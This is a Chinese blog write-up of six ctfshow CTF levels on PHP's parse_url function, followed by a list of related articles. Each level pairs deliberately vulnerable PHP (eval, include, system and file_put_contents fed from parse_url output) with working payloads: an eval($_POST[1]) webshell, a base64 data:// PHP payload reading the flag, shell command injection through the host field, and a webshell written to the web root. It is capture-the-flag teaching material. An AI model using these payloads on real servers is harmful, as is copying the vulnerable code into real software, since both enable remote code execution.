ctfshow parse_url wp

于 2024-05-15 09:39:20 发布
阅读量468 收藏
点赞数 12
分类专栏: 公开赛 文章标签: android web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/138855234
版权

第一关

这个parse_url函数就是解析URL并且进行拆分的

$url = "https://www.example.com/path/to/page?param1=value1&param2=value2";

$parsed_url = parse_url($url);

print_r($parsed_url);
Array
(
    [scheme] => https
    [host] => www.example.com
    [path] => /path/to/page
    [query] => param1=value1&param2=value2
)

<?php
$data = parse_url($_GET['u']);

eval($data['host']);
源码很少就是我们需要利用域名来搞事情

GET:
?u=http://eval($_POST[1]);
POST:
1=system('cat /flag_is_here.txt');

第二关

 <?php



$data = parse_url($_GET['u']);

include $data['host'].$data['path'];

用data协议

http://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
需要进行一个base64加密
<?php system('cat /f*');?>
PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8+
加号还需要url编码
还有一个很重要的地方就是伪协议里面的data明明是一个 : ,但是这里写  ::  就是因为parse_url这个函数会吞

第三关

<?php
$data = parse_url($_GET['u']);

include $data['scheme'].$data['path'];

GET:
?u=data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b
POST:
1=system('cat /f*');

第四关

<?php
$data = parse_url($_GET['u']);

system($data['host']);

?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s_h3re
cd ..返回上级目录

在这里插入图片描述

第五关

<?php

extract(parse_url($_GET['u']));
include $$$$$$host;
extract函数是把一个数组进行拆分赋值如下图

在这里插入图片描述

也就是说先进行url分解再进行赋值然后再对host进行变量覆盖

<?php
$a=parse_url("user://pass:query@scheme/?fragment%23data://,<?php system('cat /_f1ag_1s_h3ree');?>");
//var_dump($a);
$b=extract($a);
//var_dump($b);
var_dump($host);
var_dump($$host);
var_dump($$$host);
var_dump($$$$host);
var_dump($$$$$host);
var_dump($$$$$$host);
?>
输出:
string(6) "scheme"
string(4) "user"
string(4) "pass"
string(5) "query"
string(57) "fragment%23data://,"
NULL
其实不难看出这个$的变量覆盖使得最后执行php命令

第六关

<?php

$data = parse_url($_GET['u']);

file_put_contents($data['path'], $data['host']);

?u=http://<script language='php'>eval($_POST[1]);/var/www/html/1.php
然后访问1.php进行rce
path:/var/www/html/1.php
然后host他解析不出来我们就可以写一个小马
baozongwi
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php parse url ctf,一道CTF题目的探究
weixin_33907300的博客
04-14 1316
ByteCTF上遇到的一道Web题目,Boring_Code输出了代码:function is_valid_url($url) {if (filter_var($url, FILTER_VALIDATE_URL)) {if (preg_match('/data:\/\//i', $url)) {return false;}return true;}return false;}if (isset($...
CTF之Parse_url函数
Elite的博客
05-31 1901
parse_url() 是 PHP 内置函数之一,用于解析 URL 字符串,将其拆分为不同的组成部分,可以获取协议、主机名、端口号、路径、查询参数等信息。
ctfshow周末大挑战2023/5/12
T1ngSh0w的博客
05-14 970
ctfshow2023/5/12 每周大挑战 parse_url()、extract()、file_put_contents()函数在ctf中的应用
CTFShow--周末大挑战parse_url篇Writeup
Aluxian_的博客
05-15 675
【代码】CTFShow--周末大挑战Writeup。
ctfshow 其他
qq_45951598的博客
01-11 3201
web396、397、398、399、400、401 parse_url 绕过 源码 error_reporting(0); if(isset($_GET['url'])){ $url = parse_url($_GET['url']); shell_exec('echo '.$url['host'].'> '.$url['path']); }else{ highlight_file(__FILE__); } 这里没有什么限制直接绕过 payload一 ?url=http
CTFshow周末大挑战wp
qq_61955196的博客
05-13 276
本来要看政治的(卑微的周末考期末人),群主突然说有比赛就来玩玩看了。没想到ak了。这里就讲一下我的解题思路。
php使用parse_urlparse_str解析URL
10-24
`parse_url` 和 `parse_str` 是 PHP 中用于解析 URLURL 查询字符串的两个关键函数。它们在处理 URL 相关的数据时非常有用,尤其是在构建和解析 Web 服务请求或者配置连接参数时。 `parse_url` 函数的主要任务是...
浅谈PHP解析URL函数parse_urlparse_str
12-19
`parse_url` 和 `parse_str` 是两个非常有用的内置函数,分别用于解析URL的不同方面。 `parse_url` 函数用于将URL分解为其组成部分,返回一个关联数组。这个函数并不检查URL的合法性,而是尽可能正确地解析它。`...
php中使用parse_url()对网址进行解析的实现代码(parse_url详解)
10-28
parse_url用来解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分
PHP parse_url 一个好用的函数
12-18
$parts = parse_url($url); 输出: 复制代码 代码如下: Array ( [scheme] => http [host] => www.electrictoolbox.com [path] => /php-extract-domain-from-full-url/ ) 又如: 复制代码 代码如下: <?php $url = ...
CTFSHOW_周末大挑战
m0_59448417的博客
05-14 289
CTFSHOW_周末大挑战
ctfshow ssrf
weixin_52240463的博客
01-23 3263
ctfshow ssrf
php parse url ctf,【SSRF】如何绕过filter_var(), preg_match() 和 parse_url()
weixin_34094282的博客
04-14 607
0x01 前言这篇文章是在我看完一片国外安全大佬写的文章后对其进行总结并翻译得到的。0x02 正文之绕过filter_var和preg_match本片文章主要深入一种php ssrf的技术——如何绕过例如filter_var(), preg_match()和parse_url()等函数。本次我进行测试的php版本全部为php v5.6.30php-versionPHP 漏洞代码echo "Argu...
parse_url函数的解释和绕过
https://www.cnblogs.com/zpchcbd/
04-29 1万+
parse_url函数 作用:parse_url — 解析 URL,返回其组成部分 mixed parse_url ( string $url [, int $component = -1 ] ) 本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。 参数: url:要解析的 URL。无效字符将使用 _ 来替换。 component: 指定 PHP_URL_SCHEM...
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
[N1CTF 2018]eating_cms parse_url函数漏洞
qq_54929891的博客
05-14 504
进入就是一个登陆界面,随便输入一个账号密码抓包看看 发现有数据库语句,便试试万能密码 1'or'1'='1'# 发现被过滤了,一般这种题有个register.php和一个地方可以读取到源码的,我们要寻找试试 发现有注册界面,注册登陆一下 发现进入一个user.php页面,翻一下没有跟我们输入有关的回显,我们关注到有个page参数,不知道可不可以帮助我们读取到源码,直接伪协议试试 ?page=php://filter/read=convert.base64-encode/res..
[N1CTF 2018]eating_cms parse_url绕过
qq_62046696的博客
12-21 613
parse_url漏洞,有一个办法是使parse_url解析出错,从而无法进入下面的foreach判断。这道题考察的也不算是代码审计,更像是看你注意不注意细节,主要是一个个尝试的麻烦。伪协议访问会被过滤掉,直接到hacker的界面,然后我们就要想如何绕过,这句话是重点,用我们上传的文件名进行system,然后可以用管道符;为什么是这个而不是flag,是因为都试了以下,flag啥也不返回。那么问题又来了,这个既然是假的那真的上传界面在哪呢,文件上传的界面,随便上传了一个发现是一个假的界面。
parse_url小结
weixin_42478365的博客
10-06 836
1.parse_url $url = "/baidu.com:80"; $url1 = "/baidu.com:80a"; $url2 = "//pupiles.com/about:1234"; $url3 = "//baidu.com:80a"; var_dump(parse_url($url)); var_dump(parse_url($url1)); var_dump(parse_url($url2)); var_dump(parse_url($url3)); 执行以上代码:,将得到下面的结果
SQL使用parse_url
最新发布
07-16
在 SQL 中,没有类似于 PHP 中 `parse_url()` 函数的内置函数。然而,你可以使用 SQL 的字符串...总而言之,尽管 SQL 没有专门的 `parse_url()` 函数,但你可以使用字符串处理函数来解析 URL,并提取其中的各个部分。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值